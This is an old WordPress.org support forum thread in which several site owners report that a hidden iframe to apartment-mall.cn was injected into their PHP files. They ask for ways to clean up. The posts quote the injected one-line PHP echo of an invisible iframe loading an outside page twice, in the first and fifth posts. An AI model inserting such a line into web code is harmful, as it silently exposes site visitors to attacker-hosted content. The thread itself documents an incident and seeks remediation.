WordPress.org

Ready to get started?Download WordPress

Forums

50+ Blogs Hacked in One Night by "Apartment-Mall.cn" iFrames (9 posts)

  1. NI-Limits
    Member
    Posted 6 years ago #

    We recently had all (50+) wordpress blogs hacked in a single night where someone was able to add the following...

    echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';?>?>

    ...to almost ever single file within the core files!

    Other than manually removing the code from over 1,000 files, does anyone have a suggestion or encountered this themselves?

  2. StrangeAttractor
    Member
    Posted 6 years ago #

    There are a bunch of threads about similar attacks using iframes -- perhaps not this specific attacker, but sounds like the same sort of attack. Use the tags on the right and you will find threads that may be relevant.

  3. hemasunder
    Member
    Posted 6 years ago #

    today same thing happend to my blog

    what is the solution for that

    i cant find any thing here

  4. whooami
    Member
    Posted 6 years ago #

  5. vamsi
    Member
    Posted 6 years ago #

    Hi Friends I am also having the same problem, is there any solution for this problem
    (echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';?>?>).

    I just want to know the website hosting service provider of your site to check with my service provider. Can you let me known.

  6. sizzlerashwin
    Member
    Posted 6 years ago #

    guys any body say the solution instead of removing the code manually

  7. dondakaya
    Member
    Posted 6 years ago #

    ashwin> right now no other option, except removing code, either manually or you can replace the files with your local copies.

    Conversation is going on about this in this link -
    http://wordpress.org/support/topic/173127

    Post your further talks in the above link.

  8. dondakaya
    Member
    Posted 6 years ago #

    this link might be useful - http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml

    the article is big, but read it to know it. it says that its the mpack server that does all this.

  9. abellido
    Member
    Posted 6 years ago #

    Reporting Site infected with the iframe you talking about. I just discovered almost all the php files changed 29 april 2008... I removed all the entries but no guarantees it wont happend again...

    The weird thing is that we had installed wordpress but we weren´t using it finally. More details: The server/hosting by "Arsys."

    Good luck,

    Antonio

Topic Closed

This topic has been closed to new replies.

About this Topic